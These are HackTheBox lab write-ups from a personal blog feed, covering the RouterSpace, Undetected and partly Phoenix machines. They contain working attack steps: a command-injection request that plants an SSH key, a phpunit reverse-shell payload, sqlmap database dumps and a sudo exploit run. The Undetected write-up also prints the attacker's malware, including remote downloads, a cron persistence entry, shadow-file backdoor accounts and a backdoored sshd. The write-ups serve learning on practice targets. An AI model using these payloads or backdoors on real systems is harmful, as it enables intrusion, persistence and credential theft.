<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*BsMfimA0hBxGelhyQArM6Q.png" alt="burpsuite"></p>
<p>The request showed a host <code>routerspace.htb</code>, so I added this to my hosts file. I moved the request to Burp Suite&rsquo;s Repeater for easy re-sending. Given the POST data, I tried command injection and received a response.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*jMfHifxCJ1PLY2fYuXCtxg.png" alt="burpsuite-2"></p>
<p>However, attempts to execute a reverse shell did not establish a connection back to my machine. Instead, I added my SSH public key to <code>~/.ssh/authorized_keys</code> for user <code>paul</code>. The following request was used:</p>
<pre tabindex="0"><code>POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 621
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate
{
  &#34;ip&#34;:&#34;0.0.0.0;echo &#39;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZ/Zpa7gQkeiA8Zy/yDhT8RE6Zz6A2gDuhykBiedvL6hwVbUXN00yhr+nCOvs3sw37gPyvZybU/fJeosLtInIEzseOALNmmFRwSmfPvgQBZ1Qt9I3C1L1tLRTLmtDUBEEpxClvqIpO9Au4kokHjgU9+DjhTp8JVRkCBPyoxuNnPfY3SnikRYp4oWFZWgC7/vT3/yV8L1Dek+441I1gFqSrO7VLpjC5Prtstu1uOU9jfXASBIwCHi4t82N08K0pI+StBbvtzCByMIXgC3MaT2vSameaZ/1QnNTVIpVNfCYegZCm6rUiRADHWuCWnBtEZ2A2PXJWID5lTd6F5tnXqDFRsWy7RpFqowX2frf1Bd4UKPfpGyXM2+i8BdAO/fOcNExEaNxFJgoAFcaaOBCasYg9aSnpPI4rO1WYL16LLESRiN3bAP8Dd+d3bJhCgNZqCHiiT7BkZxNEXB0ldI0XDHqv6R/KNvFiW+nWBPK9czpE0OH5mCk2bB90yBnEzlkVX6E= me@nowhere&#39; &gt; /home/paul/.ssh/authorized_keys&#34;
}
</code></pre><p>I then logged in via SSH as user <code>paul</code>.</p>
<pre tabindex="0"><code>$ ssh paul@routerspace.htb
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)
[REDACTED]
paul@routerspace:~$ cat user.txt
3497cba52fcb00f[REDACTED]
</code></pre><p>After gaining access as <code>paul</code>, I enumerated the system and found the sudo version.</p>
<pre tabindex="0"><code>paul@routerspace:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
</code></pre><p>I used the <code>exploit_nss.py</code> script (<a href="https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py)">https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py)</a>. Since the machine could not establish external connections, I transferred the file using SCP.</p>
<pre tabindex="0"><code>scp exploit_nss.py paul@routerspace.htb:/tmp
</code></pre><p>After transferring the file, I ran the exploit script and obtained a root shell.</p>
<pre tabindex="0"><code>paul@routerspace:~$ cd /tmp
paul@routerspace:/tmp$ python3 exploit_nss.py
# id
uid=0(root) gid=0(root) groups=0(root),1001(paul)
# cat /root/root.txt
65cf8e2bf6627026[REDACTED]
</code></pre><p>Rooted!</p>
]]></content></item><item><title>Hackthebox Undetected</title><link>http://blog.bgz.app/posts/hackthebox-undetected/</link><pubDate>Mon, 04 Jul 2022 21:54:21 +0700</pubDate><guid>http://blog.bgz.app/posts/hackthebox-undetected/</guid><description>Undetected is a medium-difficulty Linux machine. However, it was quite challenging in terms of privilege escalation due to the need to analyze a binary.
Machine IP: 10.10.11.146
First, perform a service scan using Nmap, which reveals two open services: SSH and HTTP.
Nmap scan report for 10.10.11.146 Host is up (0.20s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2 (protocol 2.0) 80/tcp open http Apache httpd 2.</description><content type="html"><![CDATA[<p>Undetected is a medium-difficulty Linux machine. However, it was quite challenging in terms of privilege escalation due to the need to analyze a binary.</p>
<p><strong>Machine IP:</strong> 10.10.11.146</p>
<p>First, perform a service scan using Nmap, which reveals two open services: SSH and HTTP.</p>
<pre tabindex="0"><code>Nmap scan report for 10.10.11.146
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Diana&#39;s Jewelry
</code></pre><p>When I visited the website, I found a subdomain on the store page.</p>
<pre tabindex="0"><code>&lt;li class=&#34;menu-item&#34;&gt;&lt;a href=&#34;http://store.djewelry.htb&#34;&gt;STORE&lt;/a&gt;&lt;/li&gt;
</code></pre><p>I added the subdomain to my hosts file. When I accessed it, I found a store site, but most features were non-functional, displaying a notification:</p>
<pre tabindex="0"><code>Due to a website migration, we are currently not taking any online orders. Contact us if you wish to make a purchase.
</code></pre><p>I proceeded with directory enumeration using ffuf.</p>
<pre tabindex="0"><code>$ ffuf -w ~/wordlists/common.txt -u http://store.djewelry.htb/FUZZ
&lt;REDACTED&gt; -fc 403
css                     [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 113ms]
fonts                   [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 115ms]
images                  [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 114ms]
index.php               [Status: 200, Size: 6215, Words: 528, Lines: 196, Duration: 114ms]
js                      [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 112ms]
vendor                  [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 115ms]
:: Progress: [4686/4686] :: Job [1/1] :: 310 req/sec :: Duration: [0:00:16] :: Errors: 0 ::
</code></pre><p>The <code>vendor</code> directory caught my attention, and it had directory listing enabled. Inside, I found several subdirectories and identified <code>phpunit</code> version 5.6 from the last changelog.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*IzT12Jgi4n1lKcuMXzhyfg.png" alt="phpunit"></p>
<p>This version of <code>phpunit</code> has a known vulnerability (CVE-2017-9841). Exploitation involves sending code via POST data to a vulnerable script.</p>
<pre tabindex="0"><code>$ curl --data &#34;&lt;?php system(base64_decode(&#39;L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTEvNDQ0NCAwPiYxIgo=&#39;));&#34; http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
</code></pre><p>Start a listener in another terminal session to receive the connection.</p>
<pre tabindex="0"><code>$ nc -nvlp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.146 59952
bash: cannot set terminal process group (917): Inappropriate ioctl for device
bash: no job control in this shell
www-data@production:/var/www/store/vendor/phpunit/phpunit/src/Util/PHP$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</code></pre><p>After gaining a reverse shell, I typically run LinPEAS for enumeration.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*dvfNn11KkqwZD1DnBWG9pA.png" alt="linpeas"></p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*tQzR87ffo4ccnPLMPqgrTg.png" alt="info"></p>
<p>I found a file <code>/var/backups/info</code> owned by <code>www-data</code>, which was a binary file. I downloaded it to my machine for analysis.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*ek_e5dROpNvJiJaU53UTNg.png" alt="info-strings"></p>
<p>Using the <code>strings</code> command, I found a hex-encoded string. Decoding it provided the following output:</p>
<pre tabindex="0"><code>$ cat hex | xxd -p -r
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo &#34;* 3 * * * root /var/lib/.main&#34; &gt;&gt; /etc/crontab; awk -F&#34;:&#34; &#39;$7 == &#34;/bin/bash&#34; &amp;&amp; $3 &gt;= 1000 {system(&#34;echo &#34;$1&#34;1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: &gt;&gt; /etc/shadow&#34;)}&#39; /etc/passwd; awk -F&#34;:&#34; &#39;$7 == &#34;/bin/bash&#34; &amp;&amp; $3 &gt;= 1000 {system(&#34;echo &#34;$1&#34; &#34;$3&#34; &#34;$6&#34; &#34;$7&#34; &gt; users.txt&#34;)}&#39; /etc/passwd; while read -r user group home shell _; do echo &#34;$user&#34;1&#34;:x:$group:$group:,,,:$home:$shell&#34; &gt;&gt; /etc/passwd; done &lt; users.txt; rm users.txt;
</code></pre><p>Since there was a hash present, I saved it to a file and performed a brute-force attack using John the Ripper.</p>
<pre tabindex="0"><code>$ cat hash
steven1:$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7:::
$ john --wordlist=/path/to/rockyou.txt hash
$ john --show hash
steven1:ihatehackers:18813:0:99999:7:::
</code></pre><p>I logged in via SSH using the credentials <code>steven1:ihatehackers</code>.</p>
<pre tabindex="0"><code>ssh steven1@10.10.11.146
steven1@10.10.11.146&#39;s password:
steven@production:~$ id
uid=1000(steven) gid=1000(steven) groups=1000(steven)
steven@production:~$ cat user.txt
4fb6d75a0b2c5eb7[REDACTED]
</code></pre><p>Having gained access as user <code>steven</code>, I checked the mail in <code>/var/mail</code> and found an interesting message.</p>
<pre tabindex="0"><code>$ cat /var/mail/steven
From root@production  Sun, 25 Jul 2021 10:31:12 GMT
Return-Path: &lt;root@production&gt;
Received: from production (localhost [127.0.0.1])
 by production (8.15.2/8.15.2/Debian-18) with ESMTP id 80FAcdZ171847
 for &lt;steven@production&gt;; Sun, 25 Jul 2021 10:31:12 GMT
Received: (from root@localhost)
 by production (8.15.2/8.15.2/Submit) id 80FAcdZ171847;
 Sun, 25 Jul 2021 10:31:12 GMT
Date: Sun, 25 Jul 2021 10:31:12 GMT
Message-Id: &lt;202107251031.80FAcdZ171847@production&gt;
To: steven@production
From: root@production
Subject: Investigations
Hi Steven.
We recently updated the system but are still experiencing some strange behaviour with the Apache service.
We have temporarily moved the web store and database to another server whilst investigations are underway.
If for any reason you need access to the database or web application code, get in touch with Mark and he
will generate a temporary password for you to authenticate to the temporary server.
Thanks,
sysadmin
</code></pre><p>The sysadmin mentioned odd behavior with the Apache service. I inspected the modules in <code>/usr/lib/apache2/modules</code> and found a recently modified file.</p>
<pre tabindex="0"><code>-rw-r--r-- 1 root root   34800 May 17  2021 mod_reader.so
</code></pre><p>I transferred the file to my local machine for analysis and found a base64-encoded string using the <code>strings</code> command.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*Tx1dhrLpfOCOITCRHCZNFQ.png" alt="mod_reader"></p>
<pre tabindex="0"><code>$ echo &#34;d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk&#34; | base64 -d
wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd
</code></pre><p>It appeared that <code>/usr/sbin/sshd</code> had been replaced with another</p>
<p>file using <code>wget</code>. I downloaded <code>/usr/sbin/sshd</code> and analyzed it with Ghidra, finding a suspicious <code>auth_password</code> function.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">int</span> <span style="color:#a6e22e">auth_password</span>(ssh <span style="color:#f92672">*</span>ssh,<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>password)
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  Authctxt <span style="color:#f92672">*</span>ctxt;
</span></span><span style="display:flex;"><span>  passwd <span style="color:#f92672">*</span>ppVar1;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">int</span> iVar2;
</span></span><span style="display:flex;"><span>  uint uVar3;
</span></span><span style="display:flex;"><span>  byte <span style="color:#f92672">*</span>pbVar4;
</span></span><span style="display:flex;"><span>  byte <span style="color:#f92672">*</span>pbVar5;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">size_t</span> sVar6;
</span></span><span style="display:flex;"><span>  byte bVar7;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">int</span> iVar8;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">long</span> in_FS_OFFSET;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">char</span> backdoor [<span style="color:#ae81ff">31</span>];
</span></span><span style="display:flex;"><span>  byte local_39 [<span style="color:#ae81ff">9</span>];
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">long</span> local_30;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  bVar7 <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xd6</span>;
</span></span><span style="display:flex;"><span>  ctxt <span style="color:#f92672">=</span> (Authctxt <span style="color:#f92672">*</span>)ssh<span style="color:#f92672">-&gt;</span>authctxt;
</span></span><span style="display:flex;"><span>  local_30 <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>(<span style="color:#66d9ef">long</span> <span style="color:#f92672">*</span>)(in_FS_OFFSET <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x28</span>);
</span></span><span style="display:flex;"><span>  backdoor._28_2_ <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xa9f4</span>;
</span></span><span style="display:flex;"><span>  ppVar1 <span style="color:#f92672">=</span> ctxt<span style="color:#f92672">-&gt;</span>pw;
</span></span><span style="display:flex;"><span>  iVar8 <span style="color:#f92672">=</span> ctxt<span style="color:#f92672">-&gt;</span>valid;
</span></span><span style="display:flex;"><span>  backdoor._24_4_ <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xbcf0b5e3</span>;
</span></span><span style="display:flex;"><span>  backdoor._16_8_ <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xb2d6f4a0fda0b3d6</span>;
</span></span><span style="display:flex;"><span>  backdoor[<span style="color:#ae81ff">30</span>] <span style="color:#f92672">=</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">0x5b</span>;
</span></span><span style="display:flex;"><span>  backdoor._0_4_ <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xf0e7abd6</span>;
</span></span><span style="display:flex;"><span>  backdoor._4_4_ <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xa4b3a3f3</span>;
</span></span><span style="display:flex;"><span>  backdoor._8_4_ <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xf7bbfdc8</span>;
</span></span><span style="display:flex;"><span>  backdoor._12_4_ <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xfdb3d6e7</span>;
</span></span><span style="display:flex;"><span>  pbVar4 <span style="color:#f92672">=</span> (byte <span style="color:#f92672">*</span>)backdoor;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">while</span>( true ) {
</span></span><span style="display:flex;"><span>    pbVar5 <span style="color:#f92672">=</span> pbVar4 <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">*</span>pbVar4 <span style="color:#f92672">=</span> bVar7 <span style="color:#f92672">^</span> <span style="color:#ae81ff">0x96</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (pbVar5 <span style="color:#f92672">==</span> local_39) <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>    bVar7 <span style="color:#f92672">=</span> <span style="color:#f92672">*</span>pbVar5;
</span></span><span style="display:flex;"><span>    pbVar4 <span style="color:#f92672">=</span> pbVar5;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  iVar2 <span style="color:#f92672">=</span> <span style="color:#a6e22e">strcmp</span>(password,backdoor);
</span></span><span style="display:flex;"><span>  uVar3 <span style="color:#f92672">=</span> <span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> (iVar2 <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0</span>) {
</span></span><span style="display:flex;"><span>    sVar6 <span style="color:#f92672">=</span> <span style="color:#a6e22e">strlen</span>(password);
</span></span><span style="display:flex;"><span>    uVar3 <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (sVar6 <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">0x401</span>) {
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">if</span> ((ppVar1<span style="color:#f92672">-&gt;</span>pw_uid <span style="color:#f92672">==</span> <span style="color:#ae81ff">0</span>) <span style="color:#f92672">&amp;&amp;</span> (options.permit_root_login <span style="color:#f92672">!=</span> <span style="color:#ae81ff">3</span>)) {
</span></span><span style="display:flex;"><span>        iVar8 <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">if</span> ((<span style="color:#f92672">*</span>password <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#39;\0&#39;</span>) <span style="color:#f92672">||</span>
</span></span><span style="display:flex;"><span>         (uVar3 <span style="color:#f92672">=</span> options.permit_empty_passwd, options.permit_empty_passwd <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0</span>)) {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (auth_password<span style="color:#f92672">::</span>expire_checked <span style="color:#f92672">==</span> <span style="color:#ae81ff">0</span>) {
</span></span><span style="display:flex;"><span>          auth_password<span style="color:#f92672">::</span>expire_checked <span style="color:#f92672">=</span> <span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>          iVar2 <span style="color:#f92672">=</span> <span style="color:#a6e22e">auth_shadow_pwexpired</span>(ctxt);
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">if</span> (iVar2 <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0</span>) {
</span></span><span style="display:flex;"><span>            ctxt<span style="color:#f92672">-&gt;</span>force_pwchange <span style="color:#f92672">=</span> <span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        iVar2 <span style="color:#f92672">=</span> <span style="color:#a6e22e">sys_auth_passwd</span>(ssh,password);
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (ctxt<span style="color:#f92672">-&gt;</span>force_pwchange <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0</span>) {
</span></span><span style="display:flex;"><span>          <span style="color:#a6e22e">auth_restrict_session</span>(ssh);
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        uVar3 <span style="color:#f92672">=</span> (uint)(iVar2 <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0</span> <span style="color:#f92672">&amp;&amp;</span> iVar8 <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> (local_30 <span style="color:#f92672">==</span> <span style="color:#f92672">*</span>(<span style="color:#66d9ef">long</span> <span style="color:#f92672">*</span>)(in_FS_OFFSET <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x28</span>)) {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> uVar3;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">__stack_chk_fail</span>();
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>From the decompiled function, I concluded the following:</p>
<ol>
<li>The function accepts two parameters, one of which is the password.</li>
<li>Each character of the password is XOR&rsquo;d with 0x96.</li>
<li><code>strcmp(password, backdoor)</code> compares the two strings.</li>
</ol>
<p>I wrote a solver to retrieve the valid password from the <code>backdoor</code> variable.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> struct
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>backdoor  <span style="color:#f92672">=</span> struct<span style="color:#f92672">.</span>pack(<span style="color:#e6db74">&#34;&lt;I&#34;</span>, <span style="color:#ae81ff">0xf0e7abd6</span>) <span style="color:#75715e"># backdoor._0_4_</span>
</span></span><span style="display:flex;"><span>backdoor <span style="color:#f92672">+=</span> struct<span style="color:#f92672">.</span>pack(<span style="color:#e6db74">&#34;&lt;I&#34;</span>, <span style="color:#ae81ff">0xa4b3a3f3</span>) <span style="color:#75715e"># backdoor._4_4_</span>
</span></span><span style="display:flex;"><span>backdoor <span style="color:#f92672">+=</span> struct<span style="color:#f92672">.</span>pack(<span style="color:#e6db74">&#34;&lt;I&#34;</span>, <span style="color:#ae81ff">0xf7bbfdc8</span>) <span style="color:#75715e"># backdoor._8_4_</span>
</span></span><span style="display:flex;"><span>backdoor <span style="color:#f92672">+=</span> struct<span style="color:#f92672">.</span>pack(<span style="color:#e6db74">&#34;&lt;I&#34;</span>, <span style="color:#ae81ff">0xfdb3d6e7</span>) <span style="color:#75715e"># backdoor._12_4_</span>
</span></span><span style="display:flex;"><span>backdoor <span style="color:#f92672">+=</span> struct<span style="color:#f92672">.</span>pack(<span style="color:#e6db74">&#34;&lt;Q&#34;</span>, <span style="color:#ae81ff">0xb2d6f4a0fda0b3d6</span>) <span style="color:#75715e"># backdoor._16_8_</span>
</span></span><span style="display:flex;"><span>backdoor <span style="color:#f92672">+=</span> struct<span style="color:#f92672">.</span>pack(<span style="color:#e6db74">&#34;&lt;I&#34;</span>, <span style="color:#ae81ff">0xbcf0b5e3</span>) <span style="color:#75715e"># backdoor._24_4_</span>
</span></span><span style="display:flex;"><span>backdoor <span style="color:#f92672">+=</span> struct<span style="color:#f92672">.</span>pack(<span style="color:#e6db74">&#34;&lt;H&#34;</span>, <span style="color:#ae81ff">0xa9f4</span>) <span style="color:#75715e"># backdoor._28_2_</span>
</span></span><span style="display:flex;"><span>backdoor <span style="color:#f92672">+=</span> struct<span style="color:#f92672">.</span>pack(<span style="color:#e6db74">&#34;&lt;B&#34;</span>, <span style="color:#ae81ff">0xa5</span>) <span style="color:#75715e"># backdoor[30]</span>
</span></span><span style="display:flex;"><span>password <span style="color:#f92672">=</span> []
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> x <span style="color:#f92672">in</span> backdoor:
</span></span><span style="display:flex;"><span>    password<span style="color:#f92672">.</span>append(x <span style="color:#f92672">^</span> <span style="color:#ae81ff">0x96</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>print(bytes(password))
</span></span></code></pre></div><p>Running the script revealed the password. I then used it to log in as root via SSH.</p>
<pre tabindex="0"><code>$ python3 solve.py
b&#39;@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3&#39;
$ ssh root@10.10.11.146
root@10.10.11.146&#39;s password: @=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3
Last login: Mon Jul  4 07:38:42 2022 from 10.10.14.51
root@production:~# id
uid=0(root) gid=0(root) groups=0(root)
root@production:~# cat root.txt
4a2e48198e823b91[REDACTED]
</code></pre><p>Rooted!</p>
]]></content></item><item><title>Hackthebox Phoenix</title><link>http://blog.bgz.app/posts/hackthebox-phoenix/</link><pubDate>Mon, 27 Jun 2022 21:30:05 +0700</pubDate><guid>http://blog.bgz.app/posts/hackthebox-phoenix/</guid><description>Phoenix is a machine with the Linux OS and a difficulty level classified as hard. This machine was retired a few days ago. However, due to being busy with end-of-semester assignments and upcoming exams, I only recently managed to write about it.
Machine IP: 10.10.11.149
As always, I performed a port scan to identify the services running on the machine using Nmap.
Nmap scan report for 10.10.11.149 Host is up (0.</description><content type="html"><![CDATA[<p>Phoenix is a machine with the Linux OS and a difficulty level classified as hard. This machine was retired a few days ago. However, due to being busy with end-of-semester assignments and upcoming exams, I only recently managed to write about it.</p>
<p><strong>Machine IP:</strong> 10.10.11.149</p>
<p>As always, I performed a port scan to identify the services running on the machine using Nmap.</p>
<pre tabindex="0"><code>Nmap scan report for 10.10.11.149
Host is up (0.11s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http     Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
443/tcp  open     ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Not valid before: 2022-02-15T20:08:43
|_Not valid after:  2032-02-13T20:08:43
| tls-alpn:
|   h2
|_  http/1.1
2179/tcp filtered vmrdp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>I found several open ports such as 22, 80, and 443. Since the website on port 80 redirects to port 443 (https) with the domain <code>phoenix.htb</code>, I added this domain to my hosts file.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*TUdED2HQI1tuVb8qp6LNzQ.png" alt="web"></p>
<p>When I viewed the source of the website, I discovered that it uses WordPress. So, I scanned for themes and plugins using WPScan.</p>
<pre tabindex="0"><code>$ wpscan --url https://phoenix.htb/ --disable-tls-checks
&lt;REDACTED&gt;
[+] asgaros-forum
 | Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
 | Last Updated: 2022-01-30T12:54:00.000Z
 | [!] The version is out of date, the latest version is 2.0.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.15.12 (10% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12
&lt;REDACTED&gt;
</code></pre><p>Since the plugin was outdated, I searched for vulnerabilities in the plugin and found <a href="https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1/">CVE-2021-24827</a>.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*XULRzd2XYOM_ONkPhbgnmg.png" alt="cve"></p>
<p>After discovering this vulnerability, I exploited it using SQLMap.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://phoenix.htb/forum/?subscribe_topic=1&#34;</span> --dbs
</span></span></code></pre></div><p>Suspecting there might be more plugins, I performed further enumeration with SQLMap using the following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>sqlmap -u <span style="color:#e6db74">&#34;https://phoenix.htb/forum/?subscribe_topic=1&#34;</span> -D wordpress -T wp_options -C option_value --where <span style="color:#e6db74">&#34;option_name=&#39;active_plugins&#39;&#34;</span> --dump
</span></span></code></pre></div><p>The plugins found included:</p>
<ul>
<li>accordion-slider-gallery</li>
<li>adminimize</li>
<li>asgaros-forum</li>
<li>download-from-files</li>
<li>minionrange-2-factor-authentication</li>
<li>photo-gallery-builder</li>
<li>pie-register</li>
<li>simple-local-avatars</li>
<li>timeline-event-history</li>
</ul>
<p>Among these, the <code>download-from-files</code> plugin was vulnerable to arbitrary file upload. I found an exploit for this vulnerability on <a href="https://www.exploit-db.com/exploits/50287">Exploit-DB</a>.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*mEcEV53j0jVrzFWxmKuNsg.png" alt="cve"></p>
<p>I used the available exploit from Exploit-DB to upload a PHP reverse shell.</p>
<pre tabindex="0"><code>$ python3 exploit.py https://phoenix.htb/ ../rev.phtml
Download From Files &lt;= 1.48 - Arbitrary File Upload
Author -&gt; spacehen (www.github.com/spacehen)
Uploading Shell...
Shell Uploaded!
https://phoenix.htb/wp-admin/rev.phtml
</code></pre><p>I started a listener using Netcat, accessed the reverse shell URL, and got a connection from the machine to the listener.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*VPyRtR0t8Qr9ZOvfUtYhuA.png" alt="revshell"></p>
<p>After obtaining a reverse shell, I performed enumeration using LinPeas and found credentials for the WordPress database. I then retrieved the usernames and passwords from the <code>wp_users</code> table.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:640/format:webp/1*liZlgs-dKaQpjaFBloYS0g.png" alt="mysql"></p>
<p>I cracked several passwords using John the Ripper with the RockYou wordlist and found valid SSH credentials: <code>editor:superphoenix</code>. However, there was a verification code required. Further enumeration revealed a file <code>/etc/security/access-local.conf</code> with the following rules:</p>
<pre tabindex="0"><code>+ : ALL : 10.11.12.13/24
- : ALL : ALL
